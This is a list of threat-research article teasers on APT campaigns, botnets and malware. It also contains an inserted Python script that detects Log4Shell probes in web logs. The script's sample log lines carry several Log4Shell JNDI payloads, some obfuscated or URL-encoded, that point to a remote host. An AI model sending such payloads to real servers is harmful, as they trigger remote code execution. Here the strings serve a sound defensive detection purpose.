Twisted Panda: Chinese APT espionage operation against Russia's state-owned defense institutes

May 19, 2022 1:22 pm

Introduction: In the past two months, we observed multiple APT groups attempting to leverage the Russia and Ukraine war as a lure for espionage operations. It comes as no surprise that Russian entities...

State-sponsored Attack Groups Capitalise on Russia-Ukraine War for Cyber Espionage

March 31, 2022 12:58 pm

Introduction: Geopolitical tensions often make headlines and present a golden opportunity for threat actors to exploit the situation, especially those targeting high-profile victims. In the past month, while the Russian invasion of Ukraine...

AirDrop process of ApeCoin cryptocurrency found vulnerable, led to theft of millions of dollars in NFTs

March 19, 2022 2:10 pm

Research by: Dikla Barda, Roman Zaikin, Oded Vanunu. Highlights: ApeCoin, one of the largest NFTs today, announced a free token claim on launch. Hackers found a way to claim free tokens on ApeCoin...

Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up… Sort Of

March 10, 2022 10:04 pm

Introduction: You've probably heard of the Conti ransomware group. After their 2020 emergence, they've accumulated at least 700 victims, where by "victims" we mean 'big fish' corporations with millions of dollars in revenue;...

EvilPlayout: Attack Against Iran’s State Broadcaster

February 18, 2022 1:09 pm

In the past few months, a new wave of cyberattacks has been flooding Iran. These attacks are far from minor website defacements – the recent wave is hitting national infrastructure and causing major...

APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit

January 11, 2022 2:09 pm

Introduction: With the emergence of the Log4j security vulnerability, we've already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored...

A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard

December 27, 2021 2:30 pm

Earlier this year, Check Point Research published the story of "Jian" — an exploit used by Chinese threat actor APT31 which was "heavily inspired by" an almost-identical exploit used by the Equation Group,...

Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions

December 16, 2021 1:58 pm

Research by: Alexey Bukhteyev. Check Point Research (CPR) spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping and ransomware spread. The new variant "Twizt" enables...

The Laconic Log4Shell FAQ

December 14, 2021 7:00 pm

What is Log4Shell (CVE-2021-44228)? A Remote Code Execution vulnerability in log4j2, a popular logging framework used in Java applications. What does this mean in practice? It means you can compromise a machine by...
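Both the APT35 entry above and this FAQ concern CVE-2021-44228, whose trigger is a JNDI lookup string that log4j2 evaluates when it logs attacker-controlled text (typically a User-Agent or query parameter). The Python below is an added example, not Check Point Research's code or tooling: it scans web-server log lines for that trigger, URL-decoding each line and collapsing the nested `${lower:…}`, `${upper:…}` and `${…:-x}` lookups that real exploitation traffic used to defeat naive `${jndi:` string matching, and reports which JNDI scheme (ldap, rmi, dns, ...) the probe requested. The log lines, addresses and paths are constructed for the example.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Constructed sample access-log lines (Apache combined format). Addresses are
# documentation ranges, not real infrastructure. Lines 1-4 carry Log4Shell
# probes in the User-Agent or query string; lines 0 and 5 are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?x=${${lower:j}${upper:n}di:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://198.51.100.7/c}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /login?user=%24%7Bjndi%3Aldaps%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 401 "-" "-"',
    '203.0.113.5 - - [10/Dec/2021:12:00:06 +0000] "GET /?t=${date:yyyy-MM-dd} HTTP/1.1" 200 "-" "-"',
]

# Nested lookups that log4j 2.x resolves before evaluating ${jndi:...}, which
# attackers used to hide the literal string "jndi". Each regex only matches an
# innermost lookup (no '$', '{' or '}' inside), so repeated substitution unwinds
# arbitrary nesting from the inside out.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${prefix:key:-default} -> default

# Once de-obfuscated, the trigger is ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def denest(s: str) -> str:
    """Collapse ${lower:}, ${upper:} and ${...:-x} lookups until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _LOWER.sub(lambda m: m.group(1).lower(), s)
        s = _UPPER.sub(lambda m: m.group(1).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    # Decode twice: probes were often double-encoded to survive a proxy that decodes once.
    decoded = urllib.parse.unquote(urllib.parse.unquote(line))
    m = _JNDI.search(denest(decoded))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOG):
        print(f"line {idx}: jndi lookup via {scheme}")
```

This is a detection for the trigger string only, not for the payload it fetches: a hit tells you someone tried, and the scheme plus the embedded host tell you where the callback went, which is what you need to check egress logs for. The de-obfuscation handles the three nesting tricks that dominated in-the-wild traffic; it does not resolve lookups whose value depends on the target (`${env:...}`, `${sys:...}`), so treat any remaining `${` in request fields as suspicious in its own right.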

When old friends meet again: why Emotet chose Trickbot for rebirth

December 8, 2021 1:58 pm

Research by: Raman Ladutska, Aliaksandr Trafimchuk, David Driker, Yali Magiel. Overview: Trickbot and Emotet are considered some of the largest botnets in history. They both share a similar story: they were taken down...

Smishing Botnets Going Viral in Iran

December 1, 2021 2:33 pm

Research by: Shmuel Cohen. Introduction: In the last few months, multiple Iranian media and social networks have published warnings about ongoing SMS phishing campaigns impersonating Iranian government services. The story is as old...

Indra — Hackers Behind Recent Attacks on Iran

August 14, 2021 11:00 am

Check Point Research reveals that a threat actor named Indra is responsible for the attacks against targets in Iran, as well as against companies in Syria.

Stealth is never enough, or Revealing Formbook successor’s C&C infrastructure

August 2, 2021 5:25 pm

By: Alexey Bukhteyev & Raman Ladutska. Reliability is one of the main requirements for software, and malware is no exception. If a malware product is reliable enough to exfiltrate the data from the...

Time-proven tricks in a new environment: the macOS evolution of Formbook

July 27, 2021 11:15 pm

By: Alexey Bukhteyev & Raman Ladutska. The vast majority of threats for macOS are adware such as Shlayer, Bundlore, Pirrit, and others. Compared to Windows, we only rarely encounter really harmful macOS malware...

Top prevalent malware with a thousand campaigns migrates to macOS

July 21, 2021 12:57 pm

By: Alexey Bukhteyev and Raman Ladutska. From a simple keylogger to a top prevalent malware: Formbook is currently one of the most prevalent malware families. It has been active for more than 5 years...